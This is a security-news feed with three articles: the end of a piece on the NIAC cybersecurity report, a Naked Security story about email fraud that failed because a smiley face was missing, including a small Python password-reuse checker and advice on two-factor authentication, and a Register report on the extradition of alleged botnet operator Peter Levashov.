The urgency depicted in the NIAC report and the increasing frequency and impact of large breaches like Equifax are accelerating the government’s concern with the state of the nation’s cybersecurity. We recommend keeping an eye on the steps that will be taken based on the report’s recommendations, as we may be heading toward a cyber Sarbanes-Oxley Act.


Mike Shultz is CEO and founder of Cybernance, a SAFETY Act-designated company that regulated industries, public companies, and government agencies rely on to oversee and manage cyber-risk. Previously, Shultz was CEO of cybersecurity firm Infoglide Software, the application … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/what-security-teams-need-to-know-about-the-niac-report/a/d-id/1329999?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Email fraudsters foiled by a smiley

Annie Giles is a grapegrower in Marlborough, New Zealand, located at the top of the South Island, famous for winemaking and home of world-renowned Sauvignon Blanc. No matter what time of year, as the New Zealand marketers enthuse, there’s always something going on in Marlborough: wine tastings, tours, cycling, loads of wine cellars to explore.

No wonder grapegrower Annie Giles’ emails are always peppered with smiley faces!

…except, that is, when they’re not.

That situation came to pass when hackers took over her email account and, pretending to be Giles, wrote to the vintner that she sells her grapes to, Marlborough Vintners. They were looking for a payment due to Annie for about $90,000. “Annie” said that her bank account had been “put under review.” Hence, the payment needed to be deposited into a different account, the fraudsters explained.

Uh-huh. OK. The thing was, that email from “Annie” sure didn’t look like it was from Annie, mused Kathryn Walker, the general manager at Marlborough Vintners.

There were a number of things wrong with it, as Walker told Stuff New Zealand.

First, the language was formal, not typical of Giles’ usual bubbly correspondence. Walker was familiar with the grapegrower’s communiques, so she could tell. Besides that, Annie Giles’ husband, Graeme, hadn’t been cc’ed. Hmmm. Odd.

But the anomaly that really snatched that potential $90,000 payout out of the crooks’ grubby cyber paws: no smiley face at the end of the email.

No smiley face?!?! Red flag!!!

According to Stuff, it was about a month ago that Annie and Graeme Giles found themselves victimized by international email hackers.

The publication quoted Graeme:

Over the space of five days there were four or five emails… It wasn’t my wife at all.

The Gileses lucked out: before she went to work for the vintner, Kathryn Walker says she’d had a 12-year career in commercial banking. Besides being good at spotting emails that give off subtle clues that they’re from imposters who’ve hijacked an account, she’s also aware that whatever type of “review” the account was purportedly under “is not something that would happen.”

Walker smelled a rat, and contacted the couple before paying the money into the fraudsters’ account. Her guess is that the crooks had intercepted talk of a large sum that the Gileses had emailed each other about in the prior month.

Bank staff told Graeme Giles that the account number controlled by the crooks had been subjected to “genuine infiltration” by offshore hackers. As of Tuesday, police were reportedly still investigating the attempted theft.

Graeme Giles called this a “cautionary tale” and suggests business owners routinely update passwords.

Should you regularly update a good, gnarly, tough-to-guess, unique password? One that’s only used for one account, not copy-pasted all over multiple accounts? Well, if somebody’s managed to get their hands on the password, the answer is obviously yes. It doesn’t matter if it’s an 8-character head-desk-thumper or a 50-character beast stuffed with special characters and correcthorsebatterystaple pass phrasery: breached is breached.

Unfortunately, people often reuse their passwords on multiple sites, and hackers are well aware of it. If the password gets stolen from one site, they’ll try it on other sites to see if they can break into wherever else it’s used.
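That cross-site attack, often called credential stuffing, is exactly why reuse is the real risk. As a toy illustration (the vault, site names, and function are entirely hypothetical, and comparing unsalted digests is only acceptable in a throwaway sketch like this), here is how even a simple audit can flag shared passwords:

```python
import hashlib

def find_reused(passwords: dict[str, str]) -> set[str]:
    """Return the sites whose password is shared with at least one other site.
    Digests are grouped instead of plaintexts purely for the comparison."""
    by_digest: dict[str, list[str]] = {}
    for site, pw in passwords.items():
        digest = hashlib.sha256(pw.encode()).hexdigest()
        by_digest.setdefault(digest, []).append(site)
    return {site for sites in by_digest.values() if len(sites) > 1 for site in sites}

vault = {"shop": "hunter2", "email": "hunter2", "bank": "x9$kQ7unique"}
print(sorted(find_reused(vault)))  # ['email', 'shop']
```

A password manager does this kind of check for you; the point is that one stolen "hunter2" unlocks every account in the reused set.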

For me, the lesson learned from this stopped-by-the-smiley story isn’t so much that we should regularly change our passwords. After all, people are already suffering from security fatigue as it is. They’re bombarded by warnings of new threats to the point that they basically give up, and that’s when they start acting recklessly.

Exhausted from all the finger-wagging about not reusing passwords or changing passwords frequently, they go right ahead and reuse passwords or come up with sequential passwords that aren’t really new at all, from a cracking perspective: Here’sMyPassword1, Here’sMyPassword2, and on and on.

So, Naked Security respectfully disagrees with Giles on this, as do US standards body NIST and the UK’s National Cyber Security Centre, amongst others.

Perhaps a better lesson to learn is to use two-factor authentication (2FA) whenever it’s available. Granted, it’s not foolproof: there are good reasons why the US National Institute of Standards and Technology (NIST) recently published new guidelines deprecating SMS-based authentication. It can be hacked.

But codes generated by an authenticator app are a pretty decent defense against people taking over your accounts. Using them means that the crooks have to steal your phone and figure out your lock code in order to access the app that generates your unique sequence of logon codes.

But even those aren’t a cure-all. As Naked Security’s Paul Ducklin says:

Malware on your phone may be able to coerce the authenticator app into generating the next token without you realising it – and canny scammers may even phone you up and try to trick you into reading out your next logon code, often pretending they’re doing some sort of “fraud check”.

If in doubt, don’t give it out!

Don’t give it out, don’t pass up 2FA (it’s not invincible, but it’s good!), and pray for a savvy ex-banking pro like Kathryn Walker to be your guardian angel.

Speaking of which, while we’re at it, brush up on the type of insight that Ms. Walker has in spades. A lack of errors doesn’t mean an email is genuine, but the presence of errors might mean it isn’t, so familiarize yourself with what to watch out for to spot fraudulent emails, be it spelling errors, tone, or the gaping hole where a smiley face usually sits.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/QIRVzb5Tyro/

Russian bot-herder and election-fiddling suspect closer to US trial

The 36-year-old Russian accused of herding pump-and-dump spambots will be tried in America, following a decision of a Spanish court.

Peter Yuryevich Levashov was arrested in Spain in April 2017 and accused of running the Kelihos botnet. While early speculation floated the idea he was involved in election fiddling, his first appearance in court made it clear US authorities believed his operation was, among other things, spamming targets to try and get them to buy – and inflate the price of – worthless stock.

The Department of Justice’s list in April said he would be accused of “harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software”.

Reuters now reports Spain’s High Court has okayed Levashov’s extradition.

Levashov has a slender three days to lodge an appeal against the extradition.

In opposing the extradition, Levashov claimed he’d worked for Vladimir Putin’s United Russia party for 10 years, and he feared torture if sent to America.

He was quoted in Russian outlet RIA as saying “If I go to the U.S., I will die in a year. They want to get information of a military nature and about the United Russia party … I will be tortured, within a year I will be killed, or I will kill myself”.

The High Court ruling dismissed that, saying neither Levashov’s allegations of political motivations nor threats to his well-being had been proven.

Russia also wants to extradite Levashov. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/10/04/russian_botherder_a_step_closer_to_us_trial/